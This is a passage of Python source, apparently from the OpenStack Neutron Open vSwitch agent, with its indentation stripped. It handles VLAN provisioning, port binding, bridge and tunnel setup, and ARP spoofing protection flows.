def fdb_remove(self, context, fdb_entries):
LOG.debug("fdb_remove received")
for lvm, agent_ports in self.get_agent_ports(fdb_entries,
self.local_vlan_map):
agent_ports.pop(self.local_ip, None)
if len(agent_ports):
if not self.enable_distributed_routing:
with self.tun_br.deferred() as deferred_br:
self.fdb_remove_tun(context, deferred_br, lvm,
agent_ports,
self._tunnel_port_lookup)
else:
self.fdb_remove_tun(context, self.tun_br, lvm,
agent_ports, self._tunnel_port_lookup)
def add_fdb_flow(self, br, port_info, remote_ip, lvm, ofport):
if port_info == n_const.FLOODING_ENTRY:
lvm.tun_ofports.add(ofport)
br.install_flood_to_tun(lvm.vlan, lvm.segmentation_id,
lvm.tun_ofports)
else:
self.setup_entry_for_arp_reply(br, 'add', lvm.vlan,
port_info.mac_address,
port_info.ip_address)
br.install_unicast_to_tun(lvm.vlan,
lvm.segmentation_id,
ofport,
port_info.mac_address)
def del_fdb_flow(self, br, port_info, remote_ip, lvm, ofport):
if port_info == n_const.FLOODING_ENTRY:
if ofport not in lvm.tun_ofports:
LOG.debug("attempt to remove a non-existent port %s", ofport)
return
lvm.tun_ofports.remove(ofport)
if len(lvm.tun_ofports) > 0:
br.install_flood_to_tun(lvm.vlan, lvm.segmentation_id,
lvm.tun_ofports)
else:
# This local vlan doesn't require any more tunnelling
br.delete_flood_to_tun(lvm.vlan)
else:
self.setup_entry_for_arp_reply(br, 'remove', lvm.vlan,
port_info.mac_address,
port_info.ip_address)
br.delete_unicast_to_tun(lvm.vlan, port_info.mac_address)
def _fdb_chg_ip(self, context, fdb_entries):
LOG.debug("update chg_ip received")
with self.tun_br.deferred() as deferred_br:
self.fdb_chg_ip_tun(context, deferred_br, fdb_entries,
self.local_ip, self.local_vlan_map)
def setup_entry_for_arp_reply(self, br, action, local_vid, mac_address,
ip_address):
'''Set the ARP respond entry.
When the l2 population mechanism driver and OVS supports to edit ARP
fields, a table (ARP_RESPONDER) to resolve ARP locally is added to the
tunnel bridge.
'''
if not self.arp_responder_enabled:
return
mac = str(netaddr.EUI(mac_address, dialect=_mac_mydialect))
ip = str(netaddr.IPAddress(ip_address))
if action == 'add':
br.install_arp_responder(local_vid, ip, mac)
elif action == 'remove':
br.delete_arp_responder(local_vid, ip)
else:
LOG.warning(_LW('Action %s not supported'), action)
def _local_vlan_for_flat(self, lvid, physical_network):
phys_br = self.phys_brs[physical_network]
phys_port = self.phys_ofports[physical_network]
int_br = self.int_br
int_port = self.int_ofports[physical_network]
phys_br.provision_local_vlan(port=phys_port, lvid=lvid,
segmentation_id=None,
distributed=False)
int_br.provision_local_vlan(port=int_port, lvid=lvid,
segmentation_id=None)
def _local_vlan_for_vlan(self, lvid, physical_network, segmentation_id):
distributed = self.enable_distributed_routing
phys_br = self.phys_brs[physical_network]
phys_port = self.phys_ofports[physical_network]
int_br = self.int_br
int_port = self.int_ofports[physical_network]
phys_br.provision_local_vlan(port=phys_port, lvid=lvid,
segmentation_id=segmentation_id,
distributed=distributed)
int_br.provision_local_vlan(port=int_port, lvid=lvid,
segmentation_id=segmentation_id)
def provision_local_vlan(self, net_uuid, network_type, physical_network,
segmentation_id, local_vlan=None):
'''Provisions a local VLAN.
:param net_uuid: the uuid of the network associated with this vlan.
:param network_type: the network type ('gre', 'vxlan', 'vlan', 'flat',
'local')
:param physical_network: the physical network for 'vlan' or 'flat'
:param segmentation_id: the VID for 'vlan' or tunnel ID for 'tunnel'
'''
# On a restart or crash of OVS, the network associated with this VLAN
# will already be assigned, so check for that here before assigning a
# new one.
lvm = self.local_vlan_map.get(net_uuid)
if lvm:
lvid = lvm.vlan
else:
if local_vlan in self.available_local_vlans:
lvid = local_vlan
self.available_local_vlans.remove(local_vlan)
else:
if not self.available_local_vlans:
LOG.error(_LE("No local VLAN available for net-id=%s"),
net_uuid)
return
lvid = self.available_local_vlans.pop()
self.local_vlan_map[net_uuid] = LocalVLANMapping(lvid,
network_type,
physical_network,
segmentation_id)
LOG.info(_LI("Assigning %(vlan_id)s as local vlan for "
"net-id=%(net_uuid)s"),
{'vlan_id': lvid, 'net_uuid': net_uuid})
if network_type in constants.TUNNEL_NETWORK_TYPES:
if self.enable_tunneling:
# outbound broadcast/multicast
ofports = self.tun_br_ofports[network_type].values()
if ofports:
self.tun_br.install_flood_to_tun(lvid,
segmentation_id,
ofports)
# inbound from tunnels: set lvid in the right table
# and resubmit to Table LEARN_FROM_TUN for mac learning
if self.enable_distributed_routing:
self.dvr_agent.process_tunneled_network(
network_type, lvid, segmentation_id)
else:
self.tun_br.provision_local_vlan(
network_type=network_type, lvid=lvid,
segmentation_id=segmentation_id)
else:
LOG.error(_LE("Cannot provision %(network_type)s network for "
"net-id=%(net_uuid)s - tunneling disabled"),
{'network_type': network_type,
'net_uuid': net_uuid})
elif network_type == p_const.TYPE_FLAT:
if physical_network in self.phys_brs:
self._local_vlan_for_flat(lvid, physical_network)
else:
LOG.error(_LE("Cannot provision flat network for "
"net-id=%(net_uuid)s - no bridge for "
"physical_network %(physical_network)s"),
{'net_uuid': net_uuid,
'physical_network': physical_network})
elif network_type == p_const.TYPE_VLAN:
if physical_network in self.phys_brs:
self._local_vlan_for_vlan(lvid, physical_network,
segmentation_id)
else:
LOG.error(_LE("Cannot provision VLAN network for "
"net-id=%(net_uuid)s - no bridge for "
"physical_network %(physical_network)s"),
{'net_uuid': net_uuid,
'physical_network': physical_network})
elif network_type == p_const.TYPE_LOCAL:
# no flows needed for local networks
pass
else:
LOG.error(_LE("Cannot provision unknown network type "
"%(network_type)s for net-id=%(net_uuid)s"),
{'network_type': network_type,
'net_uuid': net_uuid})
def reclaim_local_vlan(self, net_uuid):
'''Reclaim a local VLAN.
:param net_uuid: the network uuid associated with this vlan.
'''
lvm = self.local_vlan_map.pop(net_uuid, None)
if lvm is None:
LOG.debug("Network %s not used on agent.", net_uuid)
return
LOG.info(_LI("Reclaiming vlan = %(vlan_id)s from "
"net-id = %(net_uuid)s"),
{'vlan_id': lvm.vlan, 'net_uuid': net_uuid})
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
if self.enable_tunneling:
self.tun_br.reclaim_local_vlan(
network_type=lvm.network_type,
segmentation_id=lvm.segmentation_id)
self.tun_br.delete_flood_to_tun(lvm.vlan)
self.tun_br.delete_unicast_to_tun(lvm.vlan, None)
self.tun_br.delete_arp_responder(lvm.vlan, None)
if self.l2_pop:
# Try to remove tunnel ports if not used by other networks
for ofport in lvm.tun_ofports:
self.cleanup_tunnel_port(self.tun_br, ofport,
lvm.network_type)
elif lvm.network_type == p_const.TYPE_FLAT:
if lvm.physical_network in self.phys_brs:
# outbound
br = self.phys_brs[lvm.physical_network]
br.reclaim_local_vlan(
port=self.phys_ofports[lvm.physical_network],
lvid=lvm.vlan)
# inbound
br = self.int_br
br.reclaim_local_vlan(
port=self.int_ofports[lvm.physical_network],
segmentation_id=None)
elif lvm.network_type == p_const.TYPE_VLAN:
if lvm.physical_network in self.phys_brs:
# outbound
br = self.phys_brs[lvm.physical_network]
br.reclaim_local_vlan(
port=self.phys_ofports[lvm.physical_network],
lvid=lvm.vlan)
# inbound
br = self.int_br
br.reclaim_local_vlan(
port=self.int_ofports[lvm.physical_network],
segmentation_id=lvm.segmentation_id)
elif lvm.network_type == p_const.TYPE_LOCAL:
# no flows needed for local networks
pass
else:
LOG.error(_LE("Cannot reclaim unknown network type "
"%(network_type)s for net-id=%(net_uuid)s"),
{'network_type': lvm.network_type,
'net_uuid': net_uuid})
self.available_local_vlans.add(lvm.vlan)
def port_bound(self, port, net_uuid,
network_type, physical_network,
segmentation_id, fixed_ips, device_owner,
ovs_restarted):
'''Bind port to net_uuid/lsw_id and install flow for inbound traffic
to vm.
:param port: a ovs_lib.VifPort object.
:param net_uuid: the net_uuid this port is to be associated with.
:param network_type: the network type ('gre', 'vlan', 'flat', 'local')
:param physical_network: the physical network for 'vlan' or 'flat'
:param segmentation_id: the VID for 'vlan' or tunnel ID for 'tunnel'
:param fixed_ips: the ip addresses assigned to this port
:param device_owner: the string indicative of owner of this port
:param ovs_restarted: indicates if this is called for an OVS restart.
'''
if net_uuid not in self.local_vlan_map or ovs_restarted:
self.provision_local_vlan(net_uuid, network_type,
physical_network, segmentation_id)
lvm = self.local_vlan_map[net_uuid]
lvm.vif_ports[port.vif_id] = port
self.dvr_agent.bind_port_to_dvr(port, lvm,
fixed_ips,
device_owner)
port_other_config = self.int_br.db_get_val("Port", port.port_name,
"other_config")
vlan_mapping = {'net_uuid': net_uuid,
'network_type': network_type,
'physical_network': physical_network,
'segmentation_id': segmentation_id}
port_other_config.update(vlan_mapping)
self.int_br.set_db_attribute("Port", port.port_name, "other_config",
port_other_config)
def _bind_devices(self, need_binding_ports):
devices_up = []
devices_down = []
port_info = self.int_br.db_list(
"Port", columns=["name", "tag"])
tags_by_name = {x['name']: x['tag'] for x in port_info}
for port_detail in need_binding_ports:
lvm = self.local_vlan_map.get(port_detail['network_id'])
if not lvm:
# network for port was deleted. skip this port since it
# will need to be handled as a DEAD port in the next scan
continue
port = port_detail['vif_port']
device = port_detail['device']
# Do not bind a port if it's already bound
cur_tag = tags_by_name.get(port.port_name)
if cur_tag != lvm.vlan:
self.int_br.set_db_attribute(
"Port", port.port_name, "tag", lvm.vlan)
if port.ofport != -1:
# NOTE(yamamoto): Remove possible drop_port flow
# installed by port_dead.
self.int_br.delete_flows(in_port=port.ofport)
# update plugin about port status
# FIXME(salv-orlando): Failures while updating device status
# must be handled appropriately. Otherwise this might prevent
# neutron server from sending network-vif-* events to the nova
# API server, thus possibly preventing instance spawn.
if port_detail.get('admin_state_up'):
LOG.debug("Setting status for %s to UP", device)
devices_up.append(device)
else:
LOG.debug("Setting status for %s to DOWN", device)
devices_down.append(device)
failed_devices = []
if devices_up or devices_down:
devices_set = self.plugin_rpc.update_device_list(
self.context, devices_up, devices_down, self.agent_id,
self.conf.host)
failed_devices = (devices_set.get('failed_devices_up') +
devices_set.get('failed_devices_down'))
if failed_devices:
LOG.error(_LE("Configuration for devices %s failed!"),
failed_devices)
#TODO(rossella_s) handle better the resync in next patches,
# this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=failed_devices)
LOG.info(_LI("Configuration for devices up %(up)s and devices "
"down %(down)s completed."),
{'up': devices_up, 'down': devices_down})
@staticmethod
def setup_arp_spoofing_protection(bridge, vif, port_details):
# clear any previous flows related to this port in our ARP table
bridge.delete_arp_spoofing_protection(port=vif.ofport)
if not port_details.get('port_security_enabled', True):
LOG.info(_LI("Skipping ARP spoofing rules for port '%s' because "
"it has port security disabled"), vif.port_name)
return
# collect all of the addresses and cidrs that belong to the port
addresses = {f['ip_address'] for f in port_details['fixed_ips']}
if port_details.get('allowed_address_pairs'):
addresses |= {p['ip_address']
for p in port_details['allowed_address_pairs']}
addresses = {ip for ip in addresses
if netaddr.IPNetwork(ip).version == 4}
if any(netaddr.IPNetwork(ip).prefixlen == 0 for ip in addresses):
# don't try to install protection because a /0 prefix allows any
# address anyway and the ARP_SPA can only match on /1 or more.
return
bridge.install_arp_spoofing_protection(port=vif.ofport,
ip_addresses=addresses)
def port_unbound(self, vif_id, net_uuid=None):
'''Unbind port.
Removes corresponding local vlan mapping object if this is its last
VIF.
:param vif_id: the id of the vif
:param net_uuid: the net_uuid this port is associated with.
'''
if net_uuid is None:
net_uuid = self.get_net_uuid(vif_id)
if not self.local_vlan_map.get(net_uuid):
LOG.info(_LI('port_unbound(): net_uuid %s not in local_vlan_map'),
net_uuid)
return
lvm = self.local_vlan_map[net_uuid]
if vif_id in lvm.vif_ports:
vif_port = lvm.vif_ports[vif_id]
self.dvr_agent.unbind_port_from_dvr(vif_port, lvm)
lvm.vif_ports.pop(vif_id, None)
if not lvm.vif_ports:
self.reclaim_local_vlan(net_uuid)
def port_dead(self, port, log_errors=True):
'''Once a port has no binding, put it on the "dead vlan".
:param port: a ovs_lib.VifPort object.
'''
# Don't kill a port if it's already dead
cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",
log_errors=log_errors)
if cur_tag != DEAD_VLAN_TAG:
self.int_br.set_db_attribute("Port", port.port_name, "tag",
DEAD_VLAN_TAG, log_errors=log_errors)
self.int_br.drop_port(in_port=port.ofport)
def setup_integration_br(self):
'''Setup the integration bridge.
Delete patch ports and remove all existing flows.
'''
# Ensure the integration bridge is created.
# ovs_lib.OVSBridge.create() will run
# ovs-vsctl -- --may-exist add-br BRIDGE_NAME
# which does nothing if bridge already exists.
self.int_br.create()
self.int_br.set_secure_mode()
self.int_br.setup_controllers(self.conf)
self.int_br.delete_port(self.conf.OVS.int_peer_patch_port)
self.int_br.setup_default_table()
def setup_ancillary_bridges(self, integ_br, tun_br):
'''Setup ancillary bridges - for example br-ex.'''
ovs = ovs_lib.BaseOVS()
ovs_bridges = set(ovs.get_bridges())
# Remove all known bridges
ovs_bridges.remove(integ_br)
if self.enable_tunneling:
ovs_bridges.remove(tun_br)
br_names = [self.phys_brs[physical_network].br_name for
physical_network in self.phys_brs]
ovs_bridges.difference_update(br_names)
# Filter list of bridges to those that have external
# bridge-id's configured
br_names = []
for bridge in ovs_bridges:
bridge_id = ovs.get_bridge_external_bridge_id(bridge)
if bridge_id != bridge:
br_names.append(bridge)
ovs_bridges.difference_update(br_names)
ancillary_bridges = []
for bridge in ovs_bridges:
br = ovs_lib.OVSBridge(bridge)
LOG.info(_LI('Adding %s to list of bridges.'), bridge)
ancillary_bridges.append(br)
return ancillary_bridges
def reset_tunnel_br(self, tun_br_name=None):
'''(re)initialize the tunnel bridge.
Creates tunnel bridge, and links it to the integration bridge
using a patch port.
:param tun_br_name: the name of the tunnel bridge.
'''
if not self.tun_br:
self.tun_br = self.br_tun_cls(tun_br_name)
self.tun_br.reset_bridge(secure_mode=True)
self.tun_br.setup_controllers(self.conf)
self.patch_tun_ofport = self.int_br.add_patch_port(
self.conf.OVS.int_peer_patch_port,
self.conf.OVS.tun_peer_patch_port)
self.patch_int_ofport = self.tun_br.add_patch_port(
self.conf.OVS.tun_peer_patch_port,
self.conf.OVS.int_peer_patch_port)
if ovs_lib.INVALID_OFPORT in (self.patch_tun_ofport,
self.patch_int_ofport):
LOG.error(_LE("Failed to create OVS patch port. Cannot have "
"tunneling enabled on this agent, since this "
"version of OVS does not support tunnels or patch "
"ports. Agent terminated!"))
exit(1)
self.tun_br.delete_flows()
def setup_tunnel_br(self):
'''Setup the tunnel bridge.
Add all flows to the tunnel bridge.
'''
self.tun_br.setup_default_table(self.patch_int_ofport,
self.arp_responder_enabled)
def get_peer_name(self, prefix, name):
"""Construct a peer name based on the prefix and name.
The peer name can not exceed the maximum length allowed for a linux
device. Longer names are hashed to help ensure uniqueness.
"""
if len(prefix + name) <= n_const.DEVICE_NAME_MAX_LEN:
return prefix + name
# We can't just truncate because bridges may be distinguished
# by an ident at the end. A hash over the name should be unique.
# Leave part of the bridge name on for easier identification
hashlen = 6
namelen = n_const.DEVICE_NAME_MAX_LEN - len(prefix) - hashlen
new_name = ('%(prefix)s%(truncated)s%(hash)s' %
{'prefix': prefix, 'truncated': name[0:namelen],
'hash': hashlib.sha1(name).hexdigest()[0:hashlen]})
LOG.warning(_LW("Creating an interface named %(name)s exceeds the "
"%(limit)d character limitation. It was shortened to "
"%(new_name)s to fit."),
{'name': name, 'limit': n_const.DEVICE_NAME_MAX_LEN,
'new_name': new_name})
return new_name
def setup_physical_bridges(self, bridge_mappings):
'''Setup the physical network bridges.
Creates physical network bridges and links them to the
integration bridge using veths or patch ports.
:param bridge_mappings: map physical network names to bridge names.
'''
self.phys_brs = {}
self.int_ofports = {}
self.phys_ofports = {}
ip_wrapper = ip_lib.IPWrapper()
ovs = ovs_lib.BaseOVS()
ovs_bridges = ovs.get_bridges()
for physical_network, bridge in six.iteritems(bridge_mappings):
LOG.info(_LI("Mapping physical network %(physical_network)s to "
"bridge %(bridge)s"),
{'physical_network': physical_network,
'bridge': bridge})
# setup physical bridge
if bridge not in ovs_bridges:
LOG.error(_LE("Bridge %(bridge)s for physical network "
"%(physical_network)s does not exist. Agent "
"terminated!"),
{'physical_network': physical_network,
'bridge': bridge})
sys.exit(1)
br = self.br_phys_cls(bridge)
br.setup_controllers(self.conf)
br.setup_default_table()
self.phys_brs[physical_network] = br
# interconnect physical and integration bridges using veth/patchs
int_if_name = self.get_peer_name(constants.PEER_INTEGRATION_PREFIX,
bridge)
phys_if_name = self.get_peer_name(constants.PEER_PHYSICAL_PREFIX,
bridge)
self.int_br.delete_port(int_if_name)
br.delete_port(phys_if_name)
if self.use_veth_interconnection:
if ip_lib.device_exists(int_if_name):
ip_lib.IPDevice(int_if_name).link.delete()
# Give udev a chance to process its rules here, to avoid
# race conditions between commands launched by udev rules
# and the subsequent call to ip_wrapper.add_veth
utils.execute(['udevadm', 'settle', '--timeout=10'])
int_veth, phys_veth = ip_wrapper.add_veth(int_if_name,
phys_if_name)
int_ofport = self.int_br.add_port(int_veth)
phys_ofport = br.add_port(phys_veth)
else:
# Create patch ports without associating them in order to block
# untranslated traffic before association
int_ofport = self.int_br.add_patch_port(
int_if_name, constants.NONEXISTENT_PEER)
phys_ofport = br.add_patch_port(
phys_if_name, constants.NONEXISTENT_PEER)
self.int_ofports[physical_network] = int_ofport
self.phys_ofports[physical_network] = phys_ofport
# block all untranslated traffic between bridges
self.int_br.drop_port(in_port=int_ofport)
br.drop_port(in_port=phys_ofport)
if self.use_veth_interconnection:
# enable veth to pass traffic
int_veth.link.set_up()
phys_veth.link.set_up()
if self.veth_mtu:
# set up mtu size for veth interfaces
int_veth.link.set_mtu(self.veth_mtu)
phys_veth.link.set_mtu(self.veth_mtu)
else:
# associate patch ports to pass traffic
self.int_br.set_db_attribute('Interface', int_if_name,
'options:peer', phys_if_name)
br.set_db_attribute('Interface', phys_if_name,
'options:peer', int_if_name)
def update_stale_ofport_rules(self):
# right now the ARP spoofing rules are the only thing that utilizes
# ofport-based rules, so make arp_spoofing protection a conditional
# until something else uses ofport
if not self.prevent_arp_spoofing:
return
previous = self.vifname_to_ofport_map
current = self.int_br.get_vif_port_to_ofport_map()
# if any ofport numbers have changed, re-process the devices as
# added ports so any rules based on ofport numbers are updated.
moved_ports = self._get_ofport_moves(current, previous)
if moved_ports:
self.treat_devices_added_or_updated(moved_ports,
ovs_restarted=False)
# delete any stale rules based on removed ofports
ofports_deleted = set(previous.values()) - set(current.values())
for ofport in ofports_deleted:
self.int_br.delete_arp_spoofing_protection(port=ofport)
# store map for next iteration
self.vifname_to_ofport_map = current
@staticmethod
def _get_ofport_moves(current, previous):
"""Returns a list of moved ports.
Takes two port->ofport maps and returns a list ports that moved to a
different ofport. Deleted ports are not included.
"""
port_moves = []
for name, ofport in previous.items():
if name not in current:
continue
current_ofport = current[name]
if ofport != current_ofport:
port_moves.append(name)
return port_moves
def _get_port_info(self, registered_ports, cur_ports):
port_info = {'current': cur_ports}
# FIXME(salv-orlando): It's not really necessary to return early
# if nothing has changed.
if cur_ports == registered_ports:
# No added or removed ports to set, just return here
return port_info
port_info['added'] = cur_ports - registered_ports
# Remove all the known ports not found on the integration bridge
port_info['removed'] = registered_ports - cur_ports
return port_info
def scan_ports(self, registered_ports, updated_ports=None):
cur_ports = self.int_br.get_vif_port_set()
self.int_br_device_count = len(cur_ports)
port_info = self._get_port_info(registered_ports, cur_ports)
if updated_ports is None:
updated_ports = set()
updated_ports.update(self.check_changed_vlans(registered_ports))
if updated_ports:
# Some updated ports might have been removed in the
# meanwhile, and therefore should not be processed.
# In this case the updated port won't be found among
# current ports.
updated_ports &= cur_ports
if updated_ports:
port_info['updated'] = updated_ports
return port_info
def scan_ancillary_ports(self, registered_ports):
cur_ports = set()
for bridge in self.ancillary_brs:
cur_ports |= bridge.get_vif_port_set()
return self._get_port_info(registered_ports, cur_ports)
def check_changed_vlans(self, registered_ports):
"""Return ports which have lost their vlan tag.
The returned value is a set of port ids of the ports concerned by a
vlan tag loss.
"""
port_tags = self.int_br.get_port_tag_dict()
changed_ports = set()
for lvm in self.local_vlan_map.values():
for port in registered_ports:
if (
port in lvm.vif_ports
and lvm.vif_ports[port].port_name in port_tags
and port_tags[lvm.vif_ports[port].port_name] != lvm.vlan
):
LOG.info(
_LI("Port '%(port_name)s' has lost "
"its vlan tag '%(vlan_tag)d'!"),
{'port_name': lvm.vif_ports[port].port_name,
'vlan_tag': lvm.vlan}
)
changed_ports.add(port)
return changed_ports
def treat_vif_port(self, vif_port, port_id, network_id, network_type,
physical_network, segmentation_id, admin_state_up,
fixed_ips, device_owner, ovs_restarted):
# When this function is called for a port, the port should have
# an OVS ofport configured, as only these ports were considered
# for being treated. If that does not happen, it is a potential
# error condition of which operators should be aware
port_needs_binding = True
if not vif_port.ofport:
LOG.warn(_LW("VIF port: %s has no ofport configured, "
"and might not be able to transmit"), vif_port.vif_id)
if vif_port:
if admin_state_up:
self.port_bound(vif_port, network_id, network_type,
physical_network, segmentation_id,
fixed_ips, device_owner, ovs_restarted)
else:
self.port_dead(vif_port)
port_needs_binding = False
else:
LOG.debug("No VIF port for port %s defined on agent.", port_id)
return port_needs_binding
def _setup_tunnel_port(self, br, port_name, remote_ip, tunnel_type):
ofport = br.add_tunnel_port(port_name,
remote_ip,
self.local_ip,
tunnel_type,
self.vxlan_udp_port,
self.dont_fragment)
if ofport == ovs_lib.INVALID_OFPORT:
LOG.error(_LE("Failed to set-up %(type)s tunnel port to %(ip)s"),
{'type': tunnel_type, 'ip': remote_ip})
return 0
self.tun_br_ofports[tunnel_type][remote_ip] = ofport
# Add flow in default table to resubmit to the right
# tunnelling table (lvid will be set in the latter)
br.setup_tunnel_port(tunnel_type, ofport)
ofports = self.tun_br_ofports[tunnel_type].values()
if ofports and not self.l2_pop:
# Update flooding flows to include the new tunnel
for vlan_mapping in list(self.local_vlan_map.values()):
if vlan_mapping.network_type == tunnel_type:
br.install_flood_to_tun(vlan_mapping.vlan,
vlan_mapping.segmentation_id,
ofports)
return ofport
def setup_tunnel_port(self, br, remote_ip, network_type):
remote_ip_hex = self.get_ip_in_hex(remote_ip)
if not remote_ip_hex:
return 0
port_name = '%s-%s' % (network_type, remote_ip_hex)
ofport = self._setup_tunnel_port(br,
port_name,
remote_ip,
network_type)
return ofport
def cleanup_tunnel_port(self, br, tun_ofport, tunnel_type):
# Check if this tunnel port is still used
for lvm in self.local_vlan_map.values():
if tun_ofport in lvm.tun_ofports:
break
# If not, remove it
else:
items = list(self.tun_br_ofports[tunnel_type].items())
for remote_ip, ofport in items:
if ofport == tun_ofport:
port_name = '%s-%s' % (tunnel_type,
self.get_ip_in_hex(remote_ip))
br.delete_port(port_name)
br.cleanup_tunnel_port(ofport)
self.tun_br_ofports[tunnel_type].pop(remote_ip, None)
def treat_devices_added_or_updated(self, devices, ovs_restarted):
skipped_devices = []
need_binding_devices = []
devices_details_list = (
self.plugin_rpc.get_devices_details_list_and_failed_devices(
self.context,
devices,
self.agent_id,
self.conf.host))
if devices_details_list.get('failed_devices'):
#TODO(rossella_s) handle better the resync in next patches,
# this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=devices)
devices = devices_details_list.get('devices')
vif_by_id = self.int_br.get_vifs_by_ids(
[vif['device'] for vif in devices])
for details in devices:
device = details['device']
LOG.debug("Processing port: %s", device)
port = vif_by_id.get(device)
if not port:
# The port disappeared and cannot be processed
LOG.info(_LI("Port %s was not found on the integration bridge "
"and will therefore not be processed"), device)
skipped_devices.append(device)
continue
if 'port_id' in details:
LOG.info(_LI("Port %(device)s updated. Details: %(details)s"),
{'device': device, 'details': details})
need_binding = self.treat_vif_port(port, details['port_id'],
details['network_id'],
details['network_type'],
details['physical_network'],
details['segmentation_id'],
details['admin_state_up'],
details['fixed_ips'],
details['device_owner'],
ovs_restarted)
if self.prevent_arp_spoofing:
self.setup_arp_spoofing_protection(self.int_br,
port, details)
if need_binding:
details['vif_port'] = port
need_binding_devices.append(details)
else:
LOG.warn(_LW("Device %s not defined on plugin"), device)
if (port and port.ofport != -1):
self.port_dead(port)
return skipped_devices, need_binding_devices
def treat_ancillary_devices_added(self, devices):
devices_details_list = (
self.plugin_rpc.get_devices_details_list_and_failed_devices(
self.context,
devices,
self.agent_id,
self.conf.host))
if devices_details_list.get('failed_devices'):
#TODO(rossella_s) handle better the resync in next patches,
# this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=devices)
devices_added = [
d['device'] for d in devices_details_list.get('devices')]
LOG.info(_LI("Ancillary Ports %s added"), devices_added)
# update plugin about port status
devices_set_up = (
self.plugin_rpc.update_device_list(self.context,
devices_added,
[],
self.agent_id,
self.conf.host))
if devices_set_up.get('failed_devices_up'):
#TODO(rossella_s) handle better the resync in next patches,
# this is just to preserve the current behavior
raise DeviceListRetrievalError()
def treat_devices_removed(self, devices):
resync = False
self.sg_agent.remove_devices_filter(devices)
LOG.info(_LI("Ports %s removed"), devices)
devices_down = self.plugin_rpc.update_device_list(self.context,
[],
devices,
self.agent_id,
self.conf.host)
failed_devices = devices_down.get('failed_devices_down')
if failed_devices:
LOG.debug("Port removal failed for %(devices)s ", failed_devices)
resync = True
for device in devices:
self.port_unbound(device)
return resync
def treat_ancillary_devices_removed(self, devices):
resync = False
LOG.info(_LI("Ancillary ports %s removed"), devices)
devices_down = self.plugin_rpc.update_device_list(self.context,
[],
devices,
self.agent_id,
self.conf.host)
failed_devices = devices_down.get('failed_devices_down')
if failed_devices:
LOG.debug("Port removal failed for %(devices)s ", failed_devices)
resync = True
for detail in devices_down.get('devices_down'):
if detail['exists']:
LOG.info(_LI("Port %s updated."), detail['device'])
# Nothing to do regarding local networking
else:
LOG.debug("Device %s not defined on plugin", detail['device'])
return resync
def process_network_ports(self, port_info, ovs_restarted):
resync_a = False
resync_b = False
# TODO(salv-orlando): consider a solution for ensuring notifications
# are processed exactly in the same order in which they were
# received. This is tricky because there are two notification
# sources: the neutron server, and the ovs db monitor process
# If there is an exception while processing security groups ports
# will not be wired anyway, and a resync will be triggered
# VIF wiring needs to be performed always for 'new' devices.
# For updated ports, re-wiring is not needed in most cases, but needs
# to be performed anyway when the admin state of a device is changed.
# A device might be both in the 'added' and 'updated'
# list at the same time; avoid processing it twice.
devices_added_updated = (port_info.get('added', set()) |
port_info.get('updated', set()))
need_binding_devices = []
if devices_added_updated:
start = time.time()
try:
skipped_devices, need_binding_devices = (
self.treat_devices_added_or_updated(
devices_added_updated, ovs_restarted))
LOG.debug("process_network_ports - iteration:%(iter_num)d - "
"treat_devices_added_or_updated completed. "
"Skipped %(num_skipped)d devices of "
"%(num_current)d devices currently available. "
"Time elapsed: %(elapsed).3f",
{'iter_num': self.iter_num,
'num_skipped': len(skipped_devices),
'num_current': len(port_info['current']),
'elapsed': time.time() - start})
# Update the list of current ports storing only those which
# have been actually processed.
port_info['current'] = (port_info['current'] -
set(skipped_devices))
except DeviceListRetrievalError:
# Need to resync as there was an error with server
# communication.
LOG.exception(_LE("process_network_ports - iteration:%d - "
"failure while retrieving port details "
"from server"), self.iter_num)
resync_a = True
# TODO(salv-orlando): Optimize avoiding applying filters
# unnecessarily, (eg: when there are no IP address changes)
self.sg_agent.setup_port_filters(port_info.get('added', set()),
port_info.get('updated', set()))
self._bind_devices(need_binding_devices)
if 'removed' in port_info and port_info['removed']:
start = time.time()
resync_b = self.treat_devices_removed(port_info['removed'])
LOG.debug("process_network_ports - iteration:%(iter_num)d - "
"treat_devices_removed completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def process_ancillary_network_ports(self, port_info):
resync_a = False
resync_b = False
if 'added' in port_info and port_info['added']:
start = time.time()
try:
self.treat_ancillary_devices_added(port_info['added'])
LOG.debug("process_ancillary_network_ports - iteration: "
"%(iter_num)d - treat_ancillary_devices_added "
"completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
except DeviceListRetrievalError:
# Need to resync as there was an error with server
# communication.
LOG.exception(_LE("process_ancillary_network_ports - "
"iteration:%d - failure while retrieving "
"port details from server"), self.iter_num)
resync_a = True
if 'removed' in port_info and port_info['removed']:
start = time.time()
resync_b = self.treat_ancillary_devices_removed(
port_info['removed'])
LOG.debug("process_ancillary_network_ports - iteration: "
"%(iter_num)d - treat_ancillary_devices_removed "
"completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def get_ip_in_hex(self, ip_address):
try:
return '%08x' % netaddr.IPAddress(ip_address, version=4)
except Exception:
LOG.warn(_LW("Invalid remote IP: %s"), ip_address)
return
def tunnel_sync(self):
try:
for tunnel_type in self.tunnel_types:
details = self.plugin_rpc.tunnel_sync(self.context,
self.local_ip,
tunnel_type,
self.conf.host)
if not self.l2_pop:
tunnels = details['tunnels']
for tunnel in tunnels:
if self.local_ip != tunnel['ip_address']:
remote_ip = tunnel['ip_address']
remote_ip_hex = self.get_ip_in_hex(remote_ip)
if not remote_ip_hex:
continue
tun_name = '%s-%s' % (tunnel_type, remote_ip_hex)
self._setup_tunnel_port(self.tun_br,
tun_name,
tunnel['ip_address'],
tunnel_type)
except Exception as e:
LOG.debug("Unable to sync tunnel IP %(local_ip)s: %(e)s",
{'local_ip': self.local_ip, 'e': e})
return True
return False
def _agent_has_updates(self, polling_manager):
return (polling_manager.is_polling_required or
self.updated_ports or
self.sg_agent.firewall_refresh_needed())
def _port_info_has_changes(self, port_info):
return (port_info.get('added') or
port_info.get('removed') or
port_info.get('updated'))
def check_ovs_status(self):
# Check for the canary flow
status = self.int_br.check_canary_table()
if status == constants.OVS_RESTARTED:
LOG.warn(_LW("OVS is restarted. OVSNeutronAgent will reset "
"bridges and recover ports."))
